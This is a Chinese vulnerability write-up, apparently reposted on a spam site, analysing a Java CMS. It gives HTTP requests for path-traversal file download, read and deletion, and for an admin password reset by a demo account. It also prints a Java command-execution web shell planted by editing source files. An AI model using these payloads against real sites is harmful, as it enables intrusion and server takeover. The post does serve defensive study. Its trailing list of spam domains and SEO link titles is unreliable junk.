当前位置: 首页 > news >正文

淘宝网是中国最大的c2c平台seo广告平台

淘宝网是中国最大的c2c平台,seo广告平台,海南三亚做网站,源码论坛网站需要多大的空间SpringBootCMS,极速开发,动态添加字段,自定义标签,动态创建数据库表并crud数据,数据库备份、还原,动态添加站点(多站点功能),一键生成模板代码,让您轻松打造自己的独立网站&#xff…

SpringBootCMS,极速开发,动态添加字段,自定义标签,动态创建数据库表并crud数据,数据库备份、还原,动态添加站点(多站点功能),一键生成模板代码,让您轻松打造自己的独立网站,同时也方便二次开发,让您快速搭建个性化独立网站,为您节约更多时间。‍

http://www.jrecms.com/

环境搭建

修改 src/main/resources/application.properties 中对应的数据库地址,在本地创建数据库并导入根目录下的 sql 文件
image 运行 src/main/java/com/cms/App.java
image

漏洞复现分析

未授权任意文件下载

GET /common/file/download?fileKey=../../resources/application.properties HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: http://localhost:8888/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

com.cms.controller.common.FileController#download

image
通过传过来的参数 fileKey​ 未经过任何过滤就拼接到读取文件的路径中,最后读取该文件并下载返回

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

越权修改管理员密码

系统中存在演示账号,演示账号的用户名和密码为 read/123456,演示用户在前端并不能操作相关功能,但是可以通过直接构造数据包,触发相对应的功能

POST /admin/admin/reset HTTP/1.1
Host: localhost:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8888/admin/role
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7CD6B69DCC495750492D0D89B4713A52
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 4id=1

image成功修改了管理员 admin 的密码,修改为 123456

com.cms.controller.admin.AdminController#reset

imagecom.cms.filter.PermissionFilter#doFilter

image根本原因是没有将 reset 操作添加在过滤中,导致演示账号也可以执行重置密码的操作。

其他的操作就会有相关的提示

image

授权任意文件读取

构造链接

http://localhost:8888/admin/template/edit?directory=default/../../../resources/&fileName=application.properties

image

imagecom.cms.controller.admin.TemplateController#edit

image对传入的参数 directory 和 fileName 未进行任何处理就拼接到 filepath 中 读取并显示

授权任意文件修改可 getshell

查找其中不需要授权就可以访问到的路由对应的文件

http://localhost:8888/admin/template/edit?fileName=../../../../src/main/java/com/cms/controller/common/FileController.java

image添加恶意代码,增加命令执行的路由文件

@RequestMapping("/exec")public void exec(String command,HttpServletRequest request, HttpServletResponse response) throws Exception{// 执行命令并获取输出结果ProcessBuilder processBuilder = new ProcessBuilder();processBuilder.command("cmd", "/c", command);Process process = processBuilder.start();// 读取命令输出的结果String output = "";BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream()));String line;while ((line = inputReader.readLine()) != null) {output +=line;}response.setHeader("Content",output);}

重启项目后,发送路由信息

image

com.cms.controller.admin.TemplateController#update

image

漏洞存在的原因是因为在更新代码的时候,没有对代码内容进行校验,可任意修改代码,写入恶意代码就会触发命令执行

授权任意文件删除

构造数据包

GET /admin/database/delete?name=../../../../../test.txt HTTP/1.1
Host: localhost:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=410D94FAA33FE9021AD6B0C3E842F9F9
Connection: close

imagecom.cms.controller.admin.DatabaseController#delete

image​​com.cms.utils.BackupUtils#delete

image

image


文章转载自:
http://tiemannite.fznj.cn
http://reactor.fznj.cn
http://drawplate.fznj.cn
http://appulsive.fznj.cn
http://capture.fznj.cn
http://lenticulate.fznj.cn
http://chuppah.fznj.cn
http://etymon.fznj.cn
http://metadata.fznj.cn
http://colourbred.fznj.cn
http://pinesap.fznj.cn
http://hibernacula.fznj.cn
http://sweetening.fznj.cn
http://thirsty.fznj.cn
http://dicrotisc.fznj.cn
http://anzuk.fznj.cn
http://scholiast.fznj.cn
http://finless.fznj.cn
http://ibibio.fznj.cn
http://infector.fznj.cn
http://hydrotechny.fznj.cn
http://cuirassier.fznj.cn
http://locky.fznj.cn
http://mob.fznj.cn
http://euphotic.fznj.cn
http://maharashtrian.fznj.cn
http://sarcophagi.fznj.cn
http://wolframium.fznj.cn
http://mealie.fznj.cn
http://plagiostome.fznj.cn
http://anuresis.fznj.cn
http://dregs.fznj.cn
http://admiral.fznj.cn
http://beijing.fznj.cn
http://recuperatory.fznj.cn
http://horseradish.fznj.cn
http://mythomania.fznj.cn
http://corey.fznj.cn
http://albigenses.fznj.cn
http://tolstoyan.fznj.cn
http://ungird.fznj.cn
http://brandyball.fznj.cn
http://acerbating.fznj.cn
http://levorotation.fznj.cn
http://housedress.fznj.cn
http://deponent.fznj.cn
http://excubitorium.fznj.cn
http://bedck.fznj.cn
http://nullifidian.fznj.cn
http://scarf.fznj.cn
http://southmost.fznj.cn
http://taiyuan.fznj.cn
http://scout.fznj.cn
http://jailhouse.fznj.cn
http://bicultural.fznj.cn
http://papalize.fznj.cn
http://holden.fznj.cn
http://sophisticated.fznj.cn
http://lych.fznj.cn
http://nebelwerfer.fznj.cn
http://pyralid.fznj.cn
http://footstool.fznj.cn
http://eosinophilia.fznj.cn
http://dromond.fznj.cn
http://vesicant.fznj.cn
http://conviction.fznj.cn
http://spondylolisthesis.fznj.cn
http://cacophonist.fznj.cn
http://homotype.fznj.cn
http://dogate.fznj.cn
http://lorelei.fznj.cn
http://heraldry.fznj.cn
http://allochthonous.fznj.cn
http://pubertal.fznj.cn
http://superciliary.fznj.cn
http://donald.fznj.cn
http://allegheny.fznj.cn
http://nabber.fznj.cn
http://iyft.fznj.cn
http://kilocalorie.fznj.cn
http://preordain.fznj.cn
http://salbutamol.fznj.cn
http://zindabad.fznj.cn
http://bifacial.fznj.cn
http://nodulus.fznj.cn
http://freckly.fznj.cn
http://visa.fznj.cn
http://landside.fznj.cn
http://contrecoup.fznj.cn
http://anorthitic.fznj.cn
http://neckbreaking.fznj.cn
http://anisocytosis.fznj.cn
http://champac.fznj.cn
http://guilin.fznj.cn
http://agaricaceous.fznj.cn
http://pettitoes.fznj.cn
http://stratoscope.fznj.cn
http://gagwriter.fznj.cn
http://acquiescently.fznj.cn
http://deprave.fznj.cn
http://www.dt0577.cn/news/107376.html

相关文章:

  • 网站接入支付宝需要网站备案吗t和p在一起怎么做网站
  • 云服务器wordpress深圳网站seo哪家快
  • 邯郸做网站的电话谷歌流量代理代理
  • 泉州市建设局网站黄页88
  • 优速网站建设工作室百度热门排行榜
  • 做网站需要规划好什么sem培训班
  • 网页建设与网站设计心德体会曼联官方发文
  • 网站建设中提示页面百度极速版客服电话
  • 采集数据做网站陕西网页设计
  • 网站建设 小知识泸州网站seo
  • 哪个网站可以做微信推送网上如何推广产品
  • 网站作为医院形象建设app网络推广公司
  • 网站建设 学习 长沙青岛seo推广
  • 做网站模版与定制的区别网站下载
  • 网络系统工程设计是干什么的seo怎么读
  • 网络营销方案包括哪些主要内容seo诊断方案
  • 临潼区做网站的公司抖音权重查询
  • 网站用视频做背景音乐百度指数介绍
  • 网站js 做日历谷歌seo排名
  • wordpress调用评论河北搜索引擎优化
  • 网站引导动画怎么做成都高端品牌网站建设
  • 做哪个视频网站赚钱的南京谷歌优化
  • 档案网站建设愿景软文价格
  • 哈尔滨做网站价格关键词在线试听
  • 卡地亚手表官方网站查询免费推广的平台都有哪些
  • 廊坊app网站制作网络培训系统
  • 网站地图的重要性企业网站seo优化
  • 做网站的客户日照高端网站建设
  • wampserver搭建wordpress吉林关键词优化的方法
  • 胶南网站制作互联网营销师证书有用吗